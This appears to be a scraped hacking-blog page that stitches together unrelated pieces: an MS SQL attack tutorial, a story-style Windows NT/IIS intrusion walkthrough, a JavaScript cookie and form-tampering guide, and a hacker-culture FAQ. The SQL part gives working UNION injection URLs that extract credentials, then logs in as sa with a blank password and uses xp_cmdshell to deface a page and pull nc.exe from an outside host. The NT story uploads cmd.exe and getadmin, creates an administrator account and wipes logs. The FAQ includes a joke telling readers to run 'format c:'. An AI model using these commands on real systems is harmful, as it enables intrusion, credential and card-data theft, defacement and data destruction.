http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’logintable’–

output

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar

value ‘login_id’ to a column of data type int.

/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name will type

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’logintable’ WHERE COLUMN_NAME NOT IN (‘login_id’)–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar

value ‘login_name’ to a column of data type int.

/index.asp, line 5

So we get one more field name as ‘login_name’. To get the third field name we will write

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’logintable’ WHERE COLUMN_NAME NOT IN (‘login_id’,'login_name’)–

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar

value ‘passwd’ to a column of data type int.

/index.asp, line 5

Thats it. We ultimately get the ‘passwd’ field. Now lets get the login names and

passwords from this table “logintable”. Type

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar

value ‘Rahul’ to a column of data type int.

/index.asp, line 5

Thats the login name “Rahul” and to get the password of Rahul the query would be

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable

where login_name=’Rahul’–

Output:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar

value ‘P455w0rd’ to a column of data type int.

/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of

www.nosecurity.com And’s it was possible to the request of user was not checked properly. SQL

vulnerabilities still exist on many websites. The best solution is to parse the user requests and

filter out some characters as ‘,”,–,:,etc.

Part II – using port 1434 (SQL Port)

————————————-

Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !

The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are

sp_passsword -> Changes password for a specific login name.

e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> Shows all the tables in the current database.

e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)

xp_msver -> Shows the MS SQL server version including the all info about the OS.

e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key.

xp_regdeletevalue ->Delets a registry value

xp_regread -> Reads a registry value

xp_regwrite -> Writes a registry key.

xp_terminate_process -> Stops a process

Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete.

Note: “Master” is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.

Most dangerous threat : The Microsoft SQL server has default username “sa” with password blank “”. And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released.

Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle’s port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don’t even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type.

C:>osql.exe -? osql: unknown option ? usage: osql [-U login id] [-P password] [-S server] [-H hostname] [-E trusted connection] [-d use database name] [-l login timeout] [-t query timeout] [-h headers] [-s colseparator] [-w columnwidth] [-a packetsize] [-e echo input] [-I Enable Quoted Identifiers] [-L list servers] [-c cmdend] [-q "cmdline query"] [-Q "cmdline query" and exit] [-n remove numbering] [-m errorlevel] [-r msgs to stderr] [-V severitylevel] [-i inputfile] [-o outputfile] [-p print statistics] [-b On error batch abort] [-O use Old ISQL behavior disables the following] <EOF> batch processing Auto console width scaling Wide messages default errorlevel is -1 vs 1 [-? show syntax summary]

Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type

C:\> osql.exe –S 198.188.178.1 –U sa –P “”

1>

Thats what we get if we login successfully else we will get an error message as login failed for user “sa”

Now if we want to execute any command on the remote machine then just use the “xp_cmdshell” default stored procedure.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”

I would prefer to use –Q option instead of –q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the “information_schema.tables” to get the list of tables and contents of it.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”

And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”

And

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”

Output:

Username creditcard expdate ----------- ------------ ---------- Jack 5935023473209871 2004-10-03 00:00:00.000 Jill 5839203921948323 2004-07-02 00:00:00.000 Micheal 5732009850338493 2004-08-07 00:00:00.000 Ronak 5738203981300410 2004-03-02 00:00:00.000

Write something in index.html file ?

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’”

Wanna upload any file on the remote system.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”

And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.

Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers.

Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.

Precautionay measures

—————————

<*> Change the default password for sa. <*> Delete all the default stored procedures. <*> Filter out all the characters like ,",--,:,etc. <*> Keep upto date with patches <*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.

Remember security is not an add-on feature. It depends upon the smartness of administrator. The war between the hacker and administrator will go on and on and on…. The person who is aware with the latest news or bug reports will win the war. Database admins should keep in touch with some sites like

http://neworder.box.sk/redirect.php?http://sqlsecurity.com

http://neworder.box.sk/redirect.php?http://www.cert.com

credits:-not known

Windows FTP Hacking

Ankit Kumar Agarwal — Sun, 12 Oct 2008 12:08:00 +0000

The exact methods may not work, but we aren’t here to train script kiddies, we just want to make you think.

Johnny Hacker has a Windows NT Server at home. Why? Because he knows if he’s going to hack NT he’s best using the same type of computer…it gives him all the necessary tools. He has installed RAS and has a dial-up connection to the Internet. One morning, around 2:00am he dials into the Internet…his IP address is dynamically assigned to him. He opens up a Command Prompt window and gets down to work. He knows www.company.com’s web server is running IIS. How? Because he once did a search on “batch fil es as CGI” using Excites search engine. That phrase is in Chapter 8 of Internet Information Server’s on-line help….and unfortunately it’s been indexed by Excite’s spider…now Johnny has a list of around 600 web servers running IIS.

He ftps to www.company.com. He isn’t even sure yet if the server is running the ftp service. He knows if he gets a connection refused message it wont be…he’s in luck though…the following appears on the screen:

C:\ftp www.company.com
Connected to www.company.com.
220 saturn Microsoft FTP Service (Version 3.0).
User (www.comapny.com:(none)):

This connection message tells him something extremely important : The NetBIOS name of the server : SATURN. From this he can deduce the name of the anonymous internet account that is used by NT to allow people to anonymously u se the WWW, FTP and Gopher services on the machine. If the default account hasn’t been changed, and he knows that it is very rare if it has been changed, the anonymous internet account will be called IUSR_SATURN. This information will be needed later if he’s to gain Administrator access to the machine. He enters “anonymous” as the user and the following appears:

331 Anonymous access allowed, send identity (e-mail name) as password.
Password:

Johnny often tries the “guest” account before using “anonymous” as the user. A fresh install of NT has the “guest” account disabled but some admins enable this account….and the funny thing is they usually put a weak password on it such as ‘guest’ or no password at all. If he manages to gain access to the ftp service with this account he has a valid NT user account….everything that the “guest” account has access to…so does Johnny, and sometimes that can be almost everything. He knows he can access their site now…but there is still a long way to go yet….even at this point he still might not get access. At this point he doesn’t even supply a password…he just presses enter and gets a message stating that the Anonymous user is logged in.

First off he types “cd /c” because some admins will make the the root of the drive a virtual ftp directory and leave the default alias name : “/c”. Next he sees whether he can actually “put” any files onto the site ie. is the write permission enabled for this f tp site. He’s in luck. Next he types “dir” to see what he has access to. He chuckles to himself when he sees a directory called “CGI-BIN”. Obviously the Webmaster of the NT machine has put this here with the rest of the WWW site so he can remotely make changes to it. Johnny knows that the CGI-BIN has the “Execute” permission so if he can manage to put any program in here he can run it from his web browser. He hopes that the Webmaster hasn’t, using NTFS file-level security, cut off write access to the anonymous internet account to this directory…even though he knows there are sometimes ways round this. He changes to the CGI-BIN directory and then changes the type to I by using the command “binary”. Then he types “put cmd.exe”. He’s in luck..he gets the following response :

200 PORT command successful.
150 Opening BINARY mode data connection for CMD.EXE.
226 Transfer complete.
208144 bytes sent in 0.06 seconds (3469.07 Kbytes/sec)

Next he puts getadmin.exe and gasys.dll into the same directory. With these three files in place he doesn’t even gracefully “close” the ftp session; he just closes the Command Prompt window. With a smile on his face he leans back and lights a smoke, savouring the moment…he knows he has them…. After crunching the cigarette out in an overflowing ashtray he connects to AOL. He does this because if logging is enabled on the NT machine the IP address of AOL’s proxy server will be left and not his own…not that it really matters because soon he’ll edit the logfile and wipe all traces of his presence. Opening up the web browser he enters the following URL:

http://www.company.com/cgi-bin/getadmin.exe?IUSR_SATURN

After about a fifteen second wait the following appears on his web browser:

CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers.

The headers it did return are:

Congratulations , now account IUSR_SATURN have administrator rights!

He has just made the anonymous internet account a local administrator and consequently using this account he can do pretty much what he wants to. Firstly though, he has to create an account for himself that he can use to connect to the NT server using NT Explorer and most of the Administrative tools. He can’t use the IUSR_SATURN account because he doesn’t know the randomly generated password. To create an account he enters the following URL:

cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20cnn%20news%20/add

He has just created an account called “cnn” with the password “news”. To make the account a local administrator he enters the following URL:

http://www.company.com/cgi-bin/getadmin.exe?cnn

It has taken him less than ten minutes to do all of this. He disconnects from AOL and clicks on start, goes upto find and does a search for the computer www.company.com. After about a minute the computer is found, next he right clicks on the “computer” and then clicks on Explore. NT Explorer opens and after a little wait Johnny is prompted for a user-name and password. He enters “cnn” and “news”. Moments later he is connected. Admin rights for the computer www.company.com are appended to his own security access token…now he can do anything. Using User Manager for Domains he can retrieve all the account information; he can connect to the Internet Service Manager; he can view Server Manager…first though, using NT Explorer he maps a drive to the hidden system share C$. He changes to the Winnt\system32\logfiles directory and opens up the logfile for that day. He deletes all of the log entries pertaining to his “visit” and saves it. If he gets any message about sharing violations all he has to do is change the date on the computer with the following URL:

http://www.company.com/cgi-bin/cmd.exe?/c%20date%2002/02/98

Next, using the Registry Editor he connects to the registry on the remote computer. Then using L0phtcrack he dumps the SAM (the Security Accounts Manager – holds account info) on the NT server and begins cracking all the passwords on the machine. Using the Task Manager he sets the priority to Low because L0phtcrack is fairly processor intensive (NB L0phtcrack ver 2.0 sets the priority to Low anyway) and there is still a few thing he must do to hide the fact that that some-one has gained entry. He deletes cmd.exe, getadmin.exe and gasys.dll from the cgi-bin, then he checks the security event log for the remote NT server using Event Viewer to see if he’s left any traces there.

Finally using User Manager for Domains he removes admin rights from the IUSR_SATURN account and deletes the cnn account he created a few moments earlier. He doesn’t need this account anymore….L0phtcrack will be able to brute force all the accounts. Next time he connects to this machine it will be using the Administrator account. He breaks his connection to the Internet and sets L0phtcrack’s priority to High, leaves it running and heads to bed…Looking at his alarm clock : it’s just passed 2:30am….Sighing to himself, he mumbles, “Sheesh, I’m getting slow!” and falls asleep with a grin on his face.

The original filename was ntremote.txt – Author Unknown

Javascrit injections

Ankit Kumar Agarwal — Sun, 12 Oct 2008 11:45:00 +0000

Today I have brought for you another type of exploit of browser that is Javascript Injection. Javascript injection is a nifty little technique that allows you to alter a sites contents without actually leaving the site. This can be very usefull when say, you need to spoof the server by editing some form options. Examples will be explained throughout.

Injection Basics

Javascript injections are run from the URL bar of the page you are visiting. To use them, you must first completly empty the URL from the URL bar. That means no http:// or whatever.

Javascript is run from the URL bar by using the javascript: protocol. In this tutorial I will only teach you the bare bones of using this, but if you are a Javascript guru, you can expand on this using plain old javascript.

The two commands covered in this tutorial are the alert(); and void(); commands. These are pretty much all you will need in most situations. For your first javascript, you will make a simple window appear, first go to any website and then type the following into your URL bar:

javascript:alert(‘Hello, World’);

You should get a little dialog box that says “Hello, World”. This will be altered later to have more practical uses.

You can also have more than one command run at the same time:

javascript:alert(‘Hello’); alert(‘World’);

This would pop up a box that said ‘Hello’ and than another that says ‘World’.

Cookie Editing

First off, check to see if the site you are visiting has set any cookies by using this script:

javascript:alert(document.cookie);

This will pop up any information stored in the sites cookies. To edit any information, we make use of the void(); command.

javascript:void(document.cookie=”Field = myValue”);

Would either make the field “authorized” or edit it to say “yes”… now wheter or not this does anything of value depends on the site you are injecting it on.

It is also useful to tack an alert(document.cookie); at the end of the same line to see what effect your altering had.

Form Editing

Sometimes, to edit values sent to a given website through a form, you can simply download that html and edit it slightly to allow you to submit what you want. However, sometimes the website checks to see if you actually submitted it from the website you were supposed to. To get around this, we can just edit the form straight from javascript. Note: The changes are only temporary, so it’s no tuse trying to deface a site through javascript injection like this.

Every form on a given webpage (unless named otherwise) is stored in the forms[x] array… where “x” is the number, in order from top to bottom, of all the forms in a page. Note that the forms start at 0, so the first form on the page would actually be 0, and the second would be 1 and so on. Lets take this example:

Note:Since this is the first form on the page, it is forms[0]

Say this form was used to email, say vital server information to the admin of the website. You can’t just download the script and edit it because the submit.php page looks for a referer. You can check to see what value a certain form element has by using this script:

javascript:alert(document.forms[0].to.value)

This is similar to the alert(document.cookie); discussed previously. In this case, It would pop up an alert that says “admin@website.com”

So here’s how to Inject your email into it. You can use pretty much the same technique as the cookies editing shown earlier:

javascript:void(document.forms[0].to.value=”email@nhacks.com”)

This would change the email of the form to be “email@nhacks.com”. Then you could use the alert(); script shown above to check your work. Or you can couple both of these commands on one line.

credits:unknown

Q:	How do I tell if I am already a hacker?
A:	Ask yourself the following three questions: · Do you speak code, fluently? · Do you identify with the goals and values of the hacker community? · Has a well-established member of the hacker community ever called you a hacker? If you can answer yes to all three of these questions, you are already a hacker. No two alone are sufficient. The first test is about skills. You probably pass it if you have the minimum technical skills described earlier in this document. You blow right through it if you have had a substantial amount of code accepted by an open-source development project. The second test is about attitude. If the five principles of the hacker mindset seemed obvious to you, more like a description of the way you already live than anything novel, you are already halfway to passing it. That’s the inward half; the other, outward half is the degree to which you identify with the hacker community’s long-term projects. Here is an incomplete but indicative list of some of those projects: Does it matter to you that Linux improve and spread? Are you passionate about software freedom? Hostile to monopolies? Do you act on the belief that computers can be instruments of empowerment that make the world a richer and more humane place? But a note of caution is in order here. The hacker community has some specific, primarily defensive political interests — two of them are defending free-speech rights and fending off “intellectual-property” power grabs that would make open source illegal. Some of those long-term projects are civil-liberties organizations like the Electronic Frontier Foundation, and the outward attitude properly includes support of them. But beyond that, most hackers view attempts to systematize the hacker attitude into an explicit political program with suspicion; we’ve learned, the hard way, that these attempts are divisive and distracting. If someone tries to recruit you to march on your capitol in the name of the hacker attitude, they’ve missed the point. The right response is probably “Shut up and show them the code.” The third test has a tricky element of recursiveness about it. I observed in the section called “What Is a Hacker?” that being a hacker is partly a matter of belonging to a particular subculture or social network with a shared history, an inside and an outside. In the far past, hackers were a much less cohesive and self-aware group than they are today. But the importance of the social-network aspect has increased over the last thirty years as the Internet has made connections with the core of the hacker subculture easier to develop and maintain. One easy behavioral index of the change is that, in this century, we have our own T-shirts. Sociologists, who study networks like those of the hacker culture under the general rubric of “invisible colleges”, have noted that one characteristic of such networks is that they have gatekeepers — core members with the social authority to endorse new members into the network. Because the “invisible college” that is hacker culture is a loose and informal one, the role of gatekeeper is informal too. But one thing that all hackers understand in their bones is that not every hacker is a gatekeeper. Gatekeepers have to have a certain degree of seniority and accomplishment before they can bestow the title. How much is hard to quantify, but every hacker knows it when they see it.
Q:	Will you teach me how to hack?
A:	Since first publishing this page, I’ve gotten several requests a week (often several a day) from people to “teach me all about hacking”. Unfortunately, I don’t have the time or energy to do this; my own hacking projects, and working as an open-source advocate, take up 110% of my time. Even if I did, hacking is an attitude and skill you basically have to teach yourself. You’ll find that while real hackers want to help you, they won’t respect you if you beg to be spoon-fed everything they know. Learn a few things first. Show that you’re trying, that you’re capable of learning on your own. Then go to the hackers you meet with specific questions. If you do email a hacker asking for advice, here are two things to know up front. First, we’ve found that people who are lazy or careless in their writing are usually too lazy and careless in their thinking to make good hackers — so take care to spell correctly, and use good grammar and punctuation, otherwise you’ll probably be ignored. Secondly, don’t dare ask for a reply to an ISP account that’s different from the account you’re sending from; we find people who do that are usually thieves using stolen accounts, and we have no interest in rewarding or assisting thievery.
Q:	How can I get started, then?
A:	The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.
Q:	When do you have to start? Is it too late for me to learn?
A:	Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.
Q:	How long will it take me to learn to hack?
A:	That depends on how talented you are and how hard you work at it. Most people who try can acquire a respectable skill set in eighteen months to two years, if they concentrate. Don’t think it ends there, though; in hacking (as in many other fields) it takes about ten years to achieve mastery. And if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.
Q:	Is Visual Basic a good language to start with?
A:	If you’re asking this question, it almost certainly means you’re thinking about trying to hack under Microsoft Windows. This is a bad idea in itself. When I compared trying to learn to hack under Windows to trying to learn to dance while wearing a body cast, I wasn’t kidding. Don’t go there. It’s ugly, and it never stops being ugly. There is a specific problem with Visual Basic; mainly that it’s not portable. Though there is a prototype open-source implementations of Visual Basic, the applicable ECMA standards don’t cover more than a small set of its programming interfaces. On Windows most of its library support is proprietary to a single vendor (Microsoft); if you aren’t extremely careful about which features you use — more careful than any newbie is really capable of being — you’ll end up locked into only those platforms Microsoft chooses to support. If you’re starting on a Unix, much better languages with better libraries are available. Python, for example. Also, like other Basics, Visual Basic is a poorly-designed language that will teach you bad programming habits. No, don’t ask me to describe them in detail; that explanation would fill a book. Learn a well-designed language instead. One of those bad habits is becoming dependent on a single vendor’s libraries, widgets, and development tools. In general, any language that isn’t fully supported under at least Linux or one of the BSDs, and/or at least three different vendors’ operating systems, is a poor one to learn to hack in.
Q:	Would you help me to crack a system, or teach me how to crack?
A:	No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.
Q:	How can I get the password for someone else’s account?
A:	This is cracking. Go away, idiot.
Q:	How can I break into/read/monitor someone else’s email?
A:	This is cracking. Get lost, moron.
Q:	How can I steal channel op privileges on IRC?
A:	This is cracking. Begone, cretin.
Q:	I’ve been cracked. Will you help me fend off further attacks?
A:	No. Every time I’ve been asked this question so far, it’s been from some poor sap running Microsoft Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, which makes securing Windows like trying to bail out a boat with a sieve. The only reliable prevention starts with switching to Linux or some other operating system that is designed to at least be capable of security.
Q:	I’m having problems with my Windows software. Will you help me?
A:	Yes. Go to a DOS prompt and type “format c:”. Any problems you are experiencing will cease within a few minutes.
Q:	Where can I find some real hackers to talk with?
A:	The best way is to find a Unix or Linux user’s group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at ibiblio). (I used to say here that you wouldn’t find any real hackers on IRC, but I’m given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)
Q:	Can you recommend useful books about hacking-related subjects?
A:	I maintain a Linux Reading List HOWTO that you may find helpful. The Loginataka may also be interesting. For an introduction to Python, see the introductory materials on the Python site.
Q:	Do I need to be good at math to become a hacker?
A:	No. Hacking uses very little formal mathematics or arithmetic. In particular, you won’t usually need trigonometry, calculus or analysis (there are exceptions to this in a handful of specific application areas like 3-D computer graphics). Knowing some formal logic and Boolean algebra is good. Some grounding in finite mathematics (including finite-set theory, combinatorics, and graph theory) can be helpful. Much more importantly: you need to be able to think logically and follow chains of exact reasoning, the way mathematicians do. While the content of most mathematics won’t help you, you will need the discipline and intelligence to handle mathematics. If you lack the intelligence, there is little hope for you as a hacker; if you lack the discipline, you’d better grow it. I think a good way to find out if you have what it takes is to pick up a copy of Raymond Smullyan’s book What Is The Name Of This Book?. Smullyan’s playful logical conundrums are very much in the hacker spirit. Being able to solve them is a good sign; enjoying solving them is an even better one.
Q:	What language should I learn first?
A:	XHTML (the latest dialect of HTML) if you don’t already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide. But HTML is not a full programming language. When you’re ready to start programming, I would recommend starting with Python. You will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it’s harder to learn and (in my opinion) less well designed. C is really important, but it’s also much more difficult than either Python or Perl. Don’t try to learn it first. Windows users, do not settle for Visual Basic. It will teach you bad habits, and it’s not portable off Windows. Avoid.
Q:	What kind of hardware do I need?
A:	It used to be that personal computers were rather underpowered and memory-poor, enough so that they placed artificial limits on a hacker’s learning process. This stopped being true in the mid-1990s; any machine from an Intel 486DX50 up is more than powerful enough for development work, X, and Internet communications, and the smallest disks you can buy today are plenty big enough. The important thing in choosing a machine on which to learn is whether its hardware is Linux-compatible (or BSD-compatible, should you choose to go that route). Again, this will be true for almost all modern machines. The only really sticky areas are modems and wireless cards; some machines have Windows-specific hardware that won’t work with Linux. There’s a FAQ on hardware compatibility; the latest version is here.
Q:	I want to contribute. Can you help me pick a problem to work on?
A:	No, because I don’t know your talents or interests. You have to be self-motivated or you won’t stick, which is why having other people choose your direction almost never works. Try this. Watch the project announcements scroll by on Freshmeat for a few days. When you see one that makes you think “Cool! I’d like to work on that!”, join it.
Q:	Do I need to hate and bash Microsoft?
A:	No, you don’t. Not that Microsoft isn’t loathsome, but there was a hacker culture long before Microsoft and there will still be one long after Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code — that will bash Microsoft quite sufficiently without polluting your karma.
Q:	But won’t open-source software leave programmers unable to make a living?
A:	This seems unlikely — so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it’s done. And, no matter how much “free” software gets written, there always seems to be more demand for new and customized applications. I’ve written more about this at the Open Source pages.
Q:	Where can I get a free Unix?
A:	If you don’t have a Unix installed on your machine yet, elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now…